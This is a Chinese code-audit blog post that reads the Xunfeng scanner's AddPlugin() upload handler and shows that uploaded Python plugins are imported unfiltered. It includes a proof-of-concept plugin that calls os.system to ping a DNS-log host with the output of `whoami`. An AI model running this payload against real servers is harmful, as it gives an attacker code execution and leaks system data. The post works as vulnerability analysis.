巡風源碼閱讀與分析---AddPlugin()方法
文件位置:view/view.pypython
AddPlugin()數據庫
# 新增插件異步
@app.route('/addplugin', methods=['get', 'post'])
@logincheck
@anticsrf
def AddPlugin():
result = 'fail'
f = request.files['file']
isupload = request.form.get('isupload', 'false')
file_name = ''
if f:
fname = secure_filename(f.filename)
if fname.split('.')[-1] == 'py':
path = file_path + fname
if os.path.exists(file_path + fname):
fname = fname.split('.')[0] + '_' + str(datetime.now().second) + '.py'
path = file_path + fname
f.save(path)
if os.path.exists(path):
file_name = fname.split('.')[0]
module = __import__(file_name)
mark_json = module.get_plugin_info()
mark_json['filename'] = file_name
mark_json['add_time'] = datetime.now()
mark_json['count'] = 0
if 'source' not in mark_json:
mark_json['source'] = 0
insert_result = Mongo.coll['Plugin'].insert(mark_json)
if insert_result:
result = 'success'
file_name = file_name +'.py'
else:
name = request.form.get('name', '')
info = request.form.get('info', '')
author = request.form.get('author', '')
level = request.form.get('level', '')
type = request.form.get('vultype', '')
keyword = request.form.get('keyword', '')
pluginurl = request.form.get('pluginurl', '')
methodurl = request.form.get('methodurl', '')
pdata = request.form.get('pdata', '')
analyzing = request.form.get('analyzing', '')
analyzingdata = request.form.get('analyzingdata', '')
tag = request.form.get('tag', '')
try:
query = {'name': name, 'info': info, 'level': level, 'type': type, 'author': author, 'url': pluginurl,
'keyword': keyword, 'source': 0}
query['plugin'] = {'method': methodurl.split(' ', 1)[0], 'url': methodurl.split(' ', 1)[1],
'analyzing': analyzing, 'analyzingdata': analyzingdata, 'data': pdata, 'tag': tag}
file_name = secure_filename(name) + '_' + str(datetime.now().second) + ".json"
with open(file_path + file_name, 'wb') as wt:
wt.writelines(json.dumps(query))
query.pop('plugin')
query['add_time'] = datetime.now()
query['count'] = 0
query['filename'] = file_name
insert_result = Mongo.coll['Plugin'].insert(query)
if insert_result:
result = 'success'
except:
pass
if isupload == 'true' and result == 'success':
code_tuple = open(file_path+file_name).read()
code = ''
for _ in code_tuple:
code += _
params = {'code': code}
req = urllib2.Request('https://sec.ly.com/xunfeng/pluginupload')
req.add_header('Content-Type','application/x-www-form-urlencoded')
rsp = urllib2.urlopen(req,urlencode(params))
print 'upload result:' + rsp.read()
return result
先判斷插件格式是json仍是上傳python文件json
329-348行app
python文件:利用secure_filename()函數來處理文件名。secure_filename()函數只返回ASCII字符,非ASCII字符會被過濾掉。判斷是否py結尾, 文件是否存在,若是存在就從新命名。而後保存。異步
而後用__import__()加載這個文件, 獲取到裏面的get_plugin_info()的信息。咱們編寫插件的格式要有get_plugin_info()這個方法,返回插件信息。而後再加入了文件名 時間。保存到數據庫。函數
因爲使用了__import__() 能夠動態加載文件,也沒過濾。因此能夠構造個代碼執行,利用dnslog驗證下。post
import os;
def get_plugin_info():
os.system("ping `whoami`.ip.port.xxx.ceye.io");
成功url
351-379行spa
若是是json格式就接收傳來的參數,而後插入到數據庫裏,而且寫入到.json裏文件裏。插件
380-389行
若是有共享上傳而且成功了,就向ysrc也發送一份poc...
相關文章
- 1. 巡風源碼閱讀與分析---view.py
- 2. python2.7-巡風源碼閱讀
- 3. 巡風源碼閱讀與分析--querylogic函數
- 4. xunfeng(巡風)源碼解讀之vulscan
- 5. rxjava2源碼分析閱讀
- 6. ArrayList源碼閱讀分析
- 7. Vuex源碼閱讀分析
- 8. LinkedList源碼閱讀分析
- 9. AtomicInteger 源碼分析閱讀
- 10. vuex源碼閱讀分析
- 更多相關文章...
- • RSS 閱讀器 - RSS 教程
- • Scala 方法與函數 - Scala教程
- • 算法總結-二分查找法
- • 互聯網組織的未來:剖析GitHub員工的任性之源
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 升級Gradle後報錯Gradle‘s dependency cache may be corrupt (this sometimes occurs
- 2. Smarter, Not Harder
- 3. mac-2019-react-native 本地環境搭建(xcode-11.1和android studio3.5.2中Genymotion2.12.1 和VirtualBox-5.2.34 )
- 4. 查看文件中關鍵字前後幾行的內容
- 5. XXE萌新進階全攻略
- 6. Installation failed due to: ‘Connection refused: connect‘安卓studio端口占用
- 7. zabbix5.0通過agent監控winserve12
- 8. IT行業UI前景、潛力如何?
- 9. Mac Swig 3.0.12 安裝
- 10. Windows上FreeRDP-WebConnect是一個開源HTML5代理,它提供對使用RDP的任何Windows服務器和工作站的Web訪問
歡迎關注本站公眾號,獲取更多信息
相關文章